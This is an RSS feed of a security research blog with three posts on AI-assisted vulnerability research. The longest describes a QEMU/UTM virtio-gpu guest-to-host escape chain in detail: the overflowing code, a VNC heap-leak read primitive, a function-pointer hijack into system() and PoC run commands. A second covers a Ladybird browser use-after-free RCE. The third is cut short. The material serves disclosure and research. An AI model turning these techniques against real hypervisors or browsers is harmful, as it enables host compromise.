<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:googleplay="http://www.google.com/schemas/play-podcasts/1.0"><channel><title><![CDATA[Calif]]></title><description><![CDATA[Calif]]></description><link>https://blog.calif.io</link><image><url>https://blog.calif.io/img/substack.png</url><title>Calif</title><link>https://blog.calif.io</link></image><generator>Substack</generator><lastBuildDate>Thu, 30 Apr 2026 21:41:57 GMT</lastBuildDate><atom:link href="https://blog.calif.io/feed" rel="self" type="application/rss+xml"/><copyright><![CDATA[Calif Global Inc.]]></copyright><language><![CDATA[en]]></language><webMaster><![CDATA[calif@substack.com]]></webMaster><itunes:owner><itunes:email><![CDATA[calif@substack.com]]></itunes:email><itunes:name><![CDATA[Calif]]></itunes:name></itunes:owner><itunes:author><![CDATA[Calif]]></itunes:author><googleplay:owner><![CDATA[calif@substack.com]]></googleplay:owner><googleplay:email><![CDATA[calif@substack.com]]></googleplay:email><googleplay:author><![CDATA[Calif]]></googleplay:author><itunes:block><![CDATA[Yes]]></itunes:block><item><title><![CDATA[MAD Bugs: QEMU and UTM Escape]]></title><description><![CDATA[In which the guest VNCs into its own host and watches the heap like a screensaver.]]></description><link>https://blog.calif.io/p/mad-bugs-qemu-and-utm-escape</link><guid isPermaLink="false">https://blog.calif.io/p/mad-bugs-qemu-and-utm-escape</guid><pubDate>Tue, 28 Apr 2026 14:42:59 GMT</pubDate><enclosure url="https://substackcdn.com/image/youtube/w_728,c_limit/WWfxGyWoXrc" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><em>This post is part of <a href="https://blog.calif.io/t/madbugs">MAD Bugs</a>, our Month of AI-Discovered Bugs, where we pair frontier models with human expertise and publish whatever 
falls out.</em></p><blockquote><p>Before we dive in, one piece of news. Dion Blazakis and Stefan Esser are joining Calif. Dion just <s>escaped</s> left the fruit company, so we thought it'd be fitting to drop a macOS VM escape exploit.</p></blockquote><p>Our targets are <strong><a href="https://www.qemu.org/">QEMU</a></strong> and <strong><a href="https://mac.getutm.app/">UTM</a></strong>. QEMU is the open-source machine emulator and virtualizer that powers most Linux virtualization stacks: libvirt, OpenStack, KubeVirt, and the KVM side of many cloud platforms. UTM is the App-Store-friendly macOS and iOS frontend that wraps QEMU. It ships to roughly 30K GitHub stars worth of Mac users who want to run Windows or Linux on Apple Silicon without dealing with VMware (which is technically free now but rumor has it requires a blood donation to the suckers at Broadcom before the download link appears).</p><p>We noticed UTM bundles its own QEMU (10.0.2), and that there is a version drift between what UTM ships and upstream. Our first prompts to Claude were:</p><div class="callout-block" data-callout="true"><p>find any vulnerabilities patched between the UTM version and latest which could be used as an escape on UTM?</p><p>audit qemu for a new guest-host escape which specifically would work on mac/osx/utm.</p></div><p>With a handful of further prompts, it found a guest-to-host code execution chain in QEMU's <code>virtio-gpu</code> device, and wrote ~1,500 lines of C that compile to a single static binary. 
Drop it into an unprivileged process inside a vulnerable VM and Calculator opens on the host.</p><div id="youtube2-WWfxGyWoXrc" class="youtube-wrap" data-attrs="{&quot;videoId&quot;:&quot;WWfxGyWoXrc&quot;,&quot;startTime&quot;:null,&quot;endTime&quot;:null}" data-component-name="Youtube2ToDOM"><div class="youtube-inner"><iframe src="https://www.youtube-nocookie.com/embed/WWfxGyWoXrc?rel=0&amp;autoplay=0&amp;showinfo=0&amp;enablejsapi=0" frameborder="0" loading="lazy" gesture="media" allow="autoplay; fullscreen" allowautoplay="true" allowfullscreen="true" width="728" height="409"></iframe></div></div><blockquote><p><strong>Note on impact</strong>: There&#8217;s been some discussion about the impact of this exploit, so we want to clarify what we&#8217;re claiming. The VM security model assumes you have root in the guest and that the guest runs untrusted code. This exploit breaks that model in QEMU: we escape from the guest to the host and run arbitrary code there.</p><p>The chain does require QEMU&#8217;s VNC server to be enabled. VNC is the default in most headless deployments (Proxmox, libvirt, OpenStack), though UTM ships with it off. On UTM, the VM also has to have been configured in emulation mode, since UTM defaults to virtualization via Apple&#8217;s Virtualization framework, which bypasses QEMU entirely. The threat model isn&#8217;t &#8220;trick a user into downloading a preconfigured malicious UTM image.&#8221; It&#8217;s &#8220;an attacker who already has root on an isolated VM that&#8217;s running on UTM in emulation mode with VNC enabled.&#8221;</p><p>On macOS, apps also run inside Apple&#8217;s App Sandbox, so a full escape would need a second bug. We don&#8217;t think that layer is particularly strong, but we now need another bug to prove ourselves right.</p></blockquote><p>Modern memory-corruption exploitation needs two primitives: a <strong>write</strong> to corrupt state and a <strong>read</strong> to defeat ASLR and learn where to aim it. 
This bug hands over the write for free; the read is the novel part, and as far as we can tell a public first: a memory disclosure through QEMU&#8217;s own VNC server, reached over SLIRP loopback from the guest itself.</p><p>Concretely, the guest opens a TCP socket to its own host&#8217;s VNC port through QEMU&#8217;s emulated NIC at <code>10.0.2.2:5900</code>, sends a <code>FramebufferUpdateRequest</code>, and QEMU happily serializes a region of its own heap as pixel bytes back to the guest, which is now watching QEMU&#8217;s address space as if it were a screensaver. Claude assembled that read primitive autonomously from a single prompt:</p><div class="callout-block" data-callout="true"><p>figure it out the best way possible. do not modify qemu source. it needs to work from guest only. investigate turning the write to a read.</p></div><p>None of the published QEMU escapes we reviewed (<a href="https://osec.io/blog/2026-03-17-virtio-snd-qemu-hypervisor-escape/">OtterSec's virtio-snd</a>, <a href="https://phrack.org/issues/70/5">Talbi/Fariello's RTL8139</a>, the older <a href="https://blog.bi0s.in/2019/08/13/Pwn/VM-Escape/2019-07-29-qemu-vm-escape-cve-2019-14378/">SLIRP ICMP leak</a>) use the VNC server as an info-leak vehicle.</p><p>It turns out that the vulnerability was reported via ZDI (ZDI-CAN-27578) and fixed in QEMU 11.0.0 (April 21, 2026), but <strong>not backported to any 10.x stable</strong>. 
We didn't know that going in, and the rediscovery is a story in itself.</p><p><em>Even though this escape is now patched, it probably lasted longer than Cloudburst.</em></p><h2>The bug</h2><p><a href="https://github.com/qemu/qemu/blob/v10.0.2/hw/display/virtio-gpu.c#L230-L236"><code>hw/display/virtio-gpu.c</code></a> has a function, <code>calc_image_hostmem</code>, that computes how many bytes to allocate for a 2D pixel buffer:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">static uint32_t calc_image_hostmem(pixman_format_code_t pformat,
                                   uint32_t width, uint32_t height) {
    int bpp    = PIXMAN_FORMAT_BPP(pformat);
    int stride = ((width * bpp + 0x1f) &gt;&gt; 5) * sizeof(uint32_t);
    return height * stride;
}</code></pre></div><p>A quick aside on <a href="https://www.pixman.org/">pixman</a>, which will keep showing up: it is the low-level 2D pixel-manipulation library that backs Cairo and the X server, and that QEMU uses to represent every display surface in the system. A <code>pixman_image_t</code> is essentially a <code>(format, width, height, stride, raw pointer)</code> tuple plus the compositing/scaling routines that operate on it. When QEMU's <code>virtio-gpu</code> allocates a 2D resource for the guest, it is allocating a buffer and wrapping it in a <code>pixman_image_t</code>.</p><p>Every intermediate in <code>calc_image_hostmem</code> is a 32-bit <code>int</code>. For <code>bpp = 32</code> and a guest-supplied <code>width = 0x40000001</code>, the <code>width * bpp</code> multiplication wraps, the round-up-to-32-bits trick rounds the wrong number, and <code>stride</code> collapses to <strong>4</strong>. With <code>height = 128</code>, <code>calc_image_hostmem</code> returns 512. QEMU then allocates 512 bytes, hands them to pixman as <code>pixman_image_create_bits(BGRA, 0x40000001, 128, ptr, stride=4)</code>, and stores the <em>original</em>, un-overflowed <code>0x40000001</code> in <code>res-&gt;width</code>.</p><p>Every later bounds check on this resource (in <code>set_scanout</code>, in <code>transfer_to_host_2d</code>) checks against <code>res-&gt;width</code>. Which is a lie. The guest can address pixel coordinates up to ~4 GB past the actual 512-byte buffer.</p><p>That is the entire bug, but the <em>why</em> of it is interesting. Pixman's <code>pixman_image_create_bits(format, width, height, bits, rowstride)</code> has two modes. Pass <code>bits = NULL</code> and pixman allocates the buffer itself, performs its own overflow check, and ignores your <code>rowstride</code>. 
Pass <code>bits = &lt;pre-allocated pointer&gt;</code> and pixman trusts you completely: it uses your pointer, uses your stride, and runs no checks, because by API contract the caller has already validated.</p><p>Before <a href="https://github.com/qemu/qemu/commit/9462ff4695aa">a 2023 commit</a>, virtio-gpu used the first mode. <code>calc_image_hostmem</code> existed, but only to compute <code>res-&gt;hostmem</code>, the per-VM accounting number used to enforce memory budgets. Pixman did the actual allocation, and pixman caught overflow. The buggy <code>int stride</code> was lying about a counter, not a buffer size.</p><p>The 2023 commit switched to the second mode. Windows display surfaces need a shareable <code>HANDLE</code>, which means the buffer has to be allocated by QEMU with <code>qemu_win32_map_alloc()</code>, not by pixman. So virtio-gpu started allocating <code>calc_image_hostmem(...)</code> bytes itself and passing the pointer and stride into pixman. The commit message even flags the behavior change:</p><blockquote><p><em>when bits are provided to pixman_image_create_bits(), you must also give the rowstride (the argument is ignored when bits is NULL).</em></p></blockquote><p>Pixman dropped its overflow check because the API contract said it could, the same buggy function went from accounting counter to trusted allocation size, and nobody re-audited it. The caller did not validate.</p><h2>The chain</h2><p>The bug gives an OOB <em>write</em> directly: <code>transfer_to_host_2d</code> will happily copy guest-controlled bytes to <code>pixbuf + x * bpp</code> for any <code>x &lt; 0x40000001</code>. 
What it does not give you, on its own, is an OOB <em>read</em>, which means no ASLR bypass, which means the write is mostly useful for crashing the host process.</p><p>The way Claude solved the read-primitive problem is, we think, the prettiest part of this exploit, and we want to walk through it because it took us a minute to believe.</p><p><code>set_scanout</code> is the virtio-gpu command that says "this <code>pixman_image_t</code> is the active display surface; show this on the screen." The bounds check on its arguments uses the same broken <code>res-&gt;width</code>, so the guest can configure the active display surface to point at memory 1 GB past the 512-byte buffer.</p><p>QEMU has a built-in VNC server. Its job, by definition, is to encode the active display surface as pixel data and ship those bytes to any TCP client that connects to port 5900.</p><p>QEMU's default user-mode networking stack, SLIRP, makes the host reachable from the guest at <code>10.0.2.2</code>. So the guest opens a TCP socket to <code>10.0.2.2:5900</code> (its own host's VNC port, reached through QEMU's own emulated NIC), sends a <code>FramebufferUpdateRequest</code>, and QEMU's VNC server politely serializes a region of its own heap as pixel bytes back over the socket.</p><p>A <code>FramebufferUpdateRequest</code> returns <code>width &#215; height &#215; 4</code> bytes, so reads are 16 KB pages at scan time and 256 bytes for targeted lookups. Encoding host memory as pixels has the lovely side effect that there is no protocol-level interpretation, no parser, no escaping; every byte of the address range comes back unmangled, just slightly fewer per second than you'd like.</p><p>From the read primitive it's a fairly textbook macOS arm64 chain. Scan forward 16 KB at a time looking for Mach-O headers; identify pixman by <code>sizeofcmds</code>; read <code>GOT[free]</code> to derive the shared cache slide; compute <code>system()</code>. 
Plant a fake <code>pixman_implementation_t</code> whose <code>fast_paths</code> array has a wildcard entry whose <code>func</code> is <code>system()</code>. The implementation pointer is the first argument to <code>func</code> on arm64, so we put the command string at offset 0 of the same struct and let it serve double duty. Two more OOB writes neutralise pixman's TLS fast-path cache and overwrite <code>_global_implementation</code>. A final <code>RESOURCE_FLUSH</code> triggers a VNC composite, pixman walks our fake chain, the wildcard matches, <code>system()</code> runs.</p><p>The command string has to fit in 15 bytes (the <code>fast_paths</code> pointer lives at offset <code>0x10</code>), so <code>open -a Calculator</code> is too long. <code>open /*/*/Calc*</code> is exactly 15, and <code>/bin/sh</code> expands the glob to <code>/System/Applications/Calculator.app</code>. (Our first attempt, <code>/S*/A*/Ca*</code>, also matched <code>Calendar.app</code>, which made for a less convincing demo.)</p><p>UTM adds one more twist. Its QEMU allocates virtio-gpu pixel buffers through <code>qemu_pixman_image_new_shareable</code>, which is <code>memfd</code> + <code>mmap</code> rather than <code>malloc</code>, so the exploit buffer lands in an address-space hole between UTM's twenty-odd bundled frameworks instead of out in the large-object heap. dyld shuffles those frameworks on every launch, and on a meaningful fraction of boots pixman (2.4 MB, one of the smallest) ends up at a <em>lower</em> address than the first hole big enough for our buffer. The OOB write only reaches forward, so pixman's <code>_global_implementation</code> is then physically behind us and the hijack above cannot land.</p><p>The fallback is to target QEMU itself. Its image is a 29 MB block, large enough that the buffer essentially never lands above it, so the scan carries a second fingerprint table for QEMU's <code>__TEXT</code> and derives <code>system()</code> from QEMU's GOT instead. 
The control-flow hijack moves to QEMU's <code>__la_symbol_ptr[g_free]</code> (writable, ~70 MB forward, comfortably in range): one OOB write points it at <code>system()</code>, and the trigger is a deliberately short <code>RESOURCE_ATTACH_BACKING</code> whose entry bytes spell the shell command. <code>virtio_gpu_create_mapping_iov</code> <code>g_malloc</code>s a scratch buffer, copies our bytes in verbatim, fails the length check, and on the error path calls <code>g_free(ents)</code>, which is now <code>system("open -a Calculator")</code>. A nice side effect is that this path has no 15-byte limit; the command can be as long as a virtqueue descriptor.</p><p>The chain needs the guest to reach a VNC server. That is the default almost everywhere headless QEMU runs: Proxmox, libvirt's stock <code>&lt;graphics type='vnc'/&gt;</code>, OpenStack, every CI runner that boots VMs with <code>-vnc :0</code>. On UTM it is non-default, and requires a one line config <code>-vnc :0</code>. The bug itself is present in every UTM install regardless.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!MsJi!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77c9a4e3-b44c-49e2-85bc-82d81ebbe77b_1920x1600.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!MsJi!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77c9a4e3-b44c-49e2-85bc-82d81ebbe77b_1920x1600.png 424w, https://substackcdn.com/image/fetch/$s_!MsJi!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77c9a4e3-b44c-49e2-85bc-82d81ebbe77b_1920x1600.png 848w, 
https://substackcdn.com/image/fetch/$s_!MsJi!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77c9a4e3-b44c-49e2-85bc-82d81ebbe77b_1920x1600.png 1272w, https://substackcdn.com/image/fetch/$s_!MsJi!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77c9a4e3-b44c-49e2-85bc-82d81ebbe77b_1920x1600.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!MsJi!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77c9a4e3-b44c-49e2-85bc-82d81ebbe77b_1920x1600.png" width="1456" height="1213" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/77c9a4e3-b44c-49e2-85bc-82d81ebbe77b_1920x1600.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1213,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:308461,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://blog.calif.io/i/195718529?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77c9a4e3-b44c-49e2-85bc-82d81ebbe77b_1920x1600.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!MsJi!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77c9a4e3-b44c-49e2-85bc-82d81ebbe77b_1920x1600.png 424w, 
https://substackcdn.com/image/fetch/$s_!MsJi!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77c9a4e3-b44c-49e2-85bc-82d81ebbe77b_1920x1600.png 848w, https://substackcdn.com/image/fetch/$s_!MsJi!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77c9a4e3-b44c-49e2-85bc-82d81ebbe77b_1920x1600.png 1272w, https://substackcdn.com/image/fetch/$s_!MsJi!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F77c9a4e3-b44c-49e2-85bc-82d81ebbe77b_1920x1600.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" 
y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h2>Reproduce</h2><p>The PoCs and AI-generated write-up can be found <a href="https://github.com/califio/publications/blob/main/MADBugs/qemu">here</a>:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">./run_poc_macos.sh        # ~5 min: install deps, build QEMU 10.0.2, build exploit
./run_poc_macos.sh run    # ~30 sec from boot to calc</code></pre></div><h2>Conclusion</h2><p>One thing we do not know is how Claude arrived at the bug. Our first prompt asked it to diff UTM's QEMU against upstream, and the fix commit was already public; it is possible the model spotted <a href="https://github.com/qemu/qemu/commit/c035d5eadf400670593a76778f98f052d7482968">c035d5ea</a> and worked backward, and equally possible it audited <code>virtio-gpu.c</code> cold and rediscovered the overflow on its own. We cannot tell from the transcript, and either answer is kinda cool: one means a frontier model can mine patch diffs into working escapes faster than downstreams can ship the patch, the other means it can find the same bug ZDI paid for without being pointed at it.</p><p>While the bug is a simple integer overflow, the exploit is, as far as we know, the first documented case of AI doing creative <em>exploit primitive design</em>: wiring three unrelated QEMU subsystems (virtio-gpu, the VNC server, SLIRP loopback) into a leak nobody had published before.</p><p>From there it ported the chain to Linux aarch64, rebuilt it as a SPICE-safe UTM variant after we reported the original crashed under UTM's display-refresh thread, pivoted from "overwrite <code>GOT[free]</code>" to writable BSS when macOS chained-fixups turned out to make the GOT read-only, and added the QEMU-<code>g_free</code> fallback when ASLR put pixman behind the buffer. None of those pivots involved a human pointing at the answer; the <a href="https://github.com/califio/publications/blob/main/MADBugs/qemu/WRITEUP.md#conversation-prompts">full prompt log</a> is a dozen one-liners.</p><p>However, Claude hasn't (re)discovered fancy tricks such as KMART or MHST[^1] for this exploit, so the super humans among us still have some edge over it. At least for now.</p><p>[^1]: Kortchinsky-Midturi ARM ROP Technique and Midturi Heap Spray Technique. 
These are legendary exploitation techniques invented by the MSRC and SWI Pentest team fifteen or so years ago. CC <a href="https://x.com/crypt0ad">@crypt0ad</a></p>]]></content:encoded></item><item><title><![CDATA[MAD Bugs: RCE in Ladybird]]></title><description><![CDATA[When Bruce told me he wanted to hack Ladybird, my first thought was: why does the monk want to find bugs in a bug?]]></description><link>https://blog.calif.io/p/mad-bugs-rce-in-ladybird</link><guid isPermaLink="false">https://blog.calif.io/p/mad-bugs-rce-in-ladybird</guid><pubDate>Fri, 24 Apr 2026 10:07:02 GMT</pubDate><enclosure url="https://substackcdn.com/image/youtube/w_728,c_limit/NQxvMRqS_9o" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><em>This post is part of <a href="https://blog.calif.io/t/madbugs">MAD Bugs</a>, our Month of AI-Discovered Bugs, where we pair frontier models with human expertise and publish whatever falls out.</em></p><p><a href="https://ladybird.org/">Ladybird</a>, it turns out, is a new browser, written entirely from scratch with a stated rule of <em>no code from other browsers</em>. Its JavaScript engine, LibJS, is its own design too. The project <a href="https://ladybird.org/posts/adopting-rust/">adopted Rust in February</a> and picked LibJS as the first thing to port, but the migration is incremental and most of the engine, the DOM, and the WebAssembly bindings are still C++ today.</p><p>That combination made it an interesting question for this series. Everything we've pointed AI at so far has had a public exploitation history it could lean on: JavaScriptCore, the FreeBSD kernel, decades of Phrack. Ladybird has none. As far as we know nobody has published an exploit against it, and it shares no code with the engines that have a decade of writeups. So: can AI pop a browser engine it has never seen anyone hack?</p><p>Bruce pointed Claude at the source tree and had it popping calc within a few hours. 
The bug is a use-after-free in the still-C++ WebAssembly binding: a typed array's cached data pointer goes stale after a shared <code>WebAssembly.Memory</code> is grown twice.</p><div id="youtube2-NQxvMRqS_9o" class="youtube-wrap" data-attrs="{&quot;videoId&quot;:&quot;NQxvMRqS_9o&quot;,&quot;startTime&quot;:null,&quot;endTime&quot;:null}" data-component-name="Youtube2ToDOM"><div class="youtube-inner"><iframe src="https://www.youtube-nocookie.com/embed/NQxvMRqS_9o?rel=0&amp;autoplay=0&amp;showinfo=0&amp;enablejsapi=0" frameborder="0" loading="lazy" gesture="media" allow="autoplay; fullscreen" allowautoplay="true" allowfullscreen="true" width="728" height="409"></iframe></div></div><p><strong>Update, April 24:</strong> We were not the first after all. <a href="https://x.com/e65537">tsune</a> found this same bug a few days before we did, <a href="https://github.com/LadybirdBrowser/ladybird/security/advisories/GHSA-w89h-j2xg-c457">reported</a> it, got a fix landed in <code>d8aee7f1e6</code>, and published <a href="https://blog.reg.rip/exploiting-the-ladybird-browser.html">a full exploit writeup</a> while we were still poking at the source tree. That patch turned out to be incomplete (it refreshes the stale pointer on the first <code>grow()</code> but loses track of the old buffer's views on the second), which is the variant Claude landed on. 
tsune's <a href="https://x.com/e65537/status/2047626391001419866">response</a> to this post was more gracious than we deserve:</p><div class="twitter-embed" data-attrs="{&quot;url&quot;:&quot;https://x.com/e65537/status/2047626391001419866&quot;,&quot;full_text&quot;:&quot;damm, my patch was incomplete.\nThey exploited much more smartly than I did.\n<a class=\&quot;tweet-url\&quot; href=\&quot;https://blog.reg.rip/exploiting-the-ladybird-browser.html\&quot;>blog.reg.rip/exploiting-the&#8230;</a>&quot;,&quot;username&quot;:&quot;e65537&quot;,&quot;name&quot;:&quot;tsune&quot;,&quot;profile_image_url&quot;:&quot;https://pbs.substack.com/profile_images/2039350827496964096/wKy-721h_normal.jpg&quot;,&quot;date&quot;:&quot;2026-04-24T10:39:09.000Z&quot;,&quot;photos&quot;:[],&quot;quoted_tweet&quot;:{&quot;full_text&quot;:&quot;MAD Bugs: RCE in Ladybird\n\nBlog: https://t.co/I6v4maqsEJ\n\nPoC: https://t.co/g9jmtCZax0\n\nhttps://t.co/8fB8xLXw8j&quot;,&quot;username&quot;:&quot;calif_io&quot;,&quot;name&quot;:&quot;Calif&quot;,&quot;profile_image_url&quot;:&quot;https://pbs.substack.com/profile_images/1632109373312098304/g0Lwk48t_normal.jpg&quot;},&quot;reply_count&quot;:0,&quot;retweet_count&quot;:4,&quot;like_count&quot;:15,&quot;impression_count&quot;:979,&quot;expanded_url&quot;:null,&quot;video_url&quot;:null,&quot;belowTheFold&quot;:false}" data-component-name="Twitter2ToDOM"></div><h2>What it says about AI</h2><p>The first reason this worked, on an engine Claude had never seen anyone hack, is that AI needs prior art on the <em>problem class</em>, not on the target. 
Browser-engine exploitation is engine-shaped rather than codebase-shaped: a model that has internalized the JSC and V8 literature already knows how to attack any spec-compliant engine.</p><p>Every performant JavaScript runtime, implementing the same standard under the same performance pressure, ends up with the same shapes: NaN-boxed values, a cached raw data pointer in every typed array, an assembly fast path that trusts a handful of fields at fixed offsets. Ladybird arrived at all of those independently, and the standard <code>addrof</code>/<code>fakeobj</code> ladder transferred to it on first contact.</p><h2>What it says about security</h2><p>The other half of why this took hours rather than months is mitigations. After <code>addrof</code>/<code>fakeobj</code>, Claude's chain reaches <code>system()</code> by corrupting a typed array into arbitrary read/write and overwriting one function pointer. Point that same chain at Safari and three independent layers each stop it cold: Gigacage fences the typed-array read/write away from anything useful, arm64e PAC kills the process at the first unsigned indirect branch, and the WebContent sandbox blocks <code>exec</code> even past all of that. Chrome's V8 sandbox, trusted pointers, and renderer sandbox do the equivalent. Ladybird today is where those engines stood years ago.</p><p>We spend a lot of this series showing that AI can find and exploit a lot of cool bugs, and that's true. But the gap between "RCE in a few hours" on Ladybird and "months of work by a specialist team for a still-sandboxed renderer compromise" on Chrome is eighteen years of security engineering, layer on deliberate layer, each one added because the previous generation of exactly this exploit made it necessary. Watching the textbook chain walk straight through is a reminder that those layers work. 
Using AI to quickly defeat them is, we think, the current frontier of vulnerability research.</p><h2>Learn from this one</h2><p>As usual for this series, Claude found the bug and wrote the exploit on its own; the technical advisory is in the <a href="https://github.com/califio/publications/tree/main/MADBugs/ladybird">README</a>.</p><p>We then had it turn the whole thing into a <a href="https://github.com/califio/publications/blob/main/MADBugs/ladybird/WRITEUP.html">long-form teaching writeup</a>, and the way that document came together is worth a note of its own. Its first draft was correct but skipped exactly the things a newcomer wouldn't know, because Claude doesn't know what <em>you</em> don't know.</p><p>The current version is the result of us reading it, getting stuck, and asking "wait, what's the relationship between X and bufA?" or "why 16384?" or "what even is a Proxy trap?" until every gap was filled. That back-and-forth turned out to be the learning mechanism: the model is a better teacher than the literature precisely because the literature can't be interrogated, and being forced to articulate what you don't understand is most of the work of understanding it.</p><p>If you've never done browser exploitation, that writeup is worth your time. Production-engine writeups are mostly mitigation bypasses, which only make sense once you already know what the unobstructed attack looks like. This is the unobstructed attack: every primitive does exactly what its name says, in an engine simple enough to hold in your head. Read it first, and the <a href="https://github.com/califio/publications/blob/main/MADBugs/coruna/Stage1-writeup.md">Coruna JavaScriptCore chain</a> becomes the natural second chapter.</p><blockquote><p>We'd like to acknowledge the Ladybird maintainers, who were lovely about this and asked us to just file it <a href="https://github.com/LadybirdBrowser/ladybird/issues/9062">in the open</a>. 
Their security policy says pre-release bugs can be disclosed publicly, and they mean it, so everything linked above is a live 0-day with their blessing.</p></blockquote>]]></content:encoded></item><item><title><![CDATA[MAD Bugs: An Apple Kernel Bug, Brought to You by Microsoft]]></title><description><![CDATA[Autonomous N-day analysis of CVE-2026-28825.]]></description><link>https://blog.calif.io/p/mad-bugs-an-apple-kernel-bug-brought</link><guid isPermaLink="false">https://blog.calif.io/p/mad-bugs-an-apple-kernel-bug-brought</guid><dc:creator><![CDATA[Calif]]></dc:creator><pubDate>Wed, 22 Apr 2026 20:26:10 GMT</pubDate><content:encoded><![CDATA[<p><em>This post is part of <a href="https://blog.calif.io/t/madbugs">MAD Bugs</a>, our Month of AI-Discovered Bugs, where we pair frontier models with human expertise and publish whatever falls out.</em></p><p>At Calif we spend an unhealthy amount of time <a href="https://blog.calif.io/p/reverse-engineering-apples-silent">picking apart Apple security updates and beta releases</a>. Today we want to highlight <strong>CVE-2026-28825</strong>, a kernel heap out-of-bounds write in <code>smbfs.kext</code> that Apple patched in macOS 26.4, and share how we used Claude to analyze and reproduce it.</p><p>Throughout this analysis you will notice that the data comes from <code>ipsw</code>, IDA, MS-SMB2, and XNU, which is nothing unusual; people have been bindiffing Apple updates since roughly the invention of the apple. The interesting part is that the agent did this autonomously using our in-house harness, driving the same tools a human researcher would, with no human intervention between "here's a URL" and "here's a kernel panic."</p><p>What follows is a human-annotated version of what the AI did. Our commentary is in <em>italics</em>, mostly so you can tell which parts are us being smug and which parts are the robot being smart.</p><h2>The setup</h2><p>So far in this MAD Bugs series we've mostly asked models to find new bugs. 
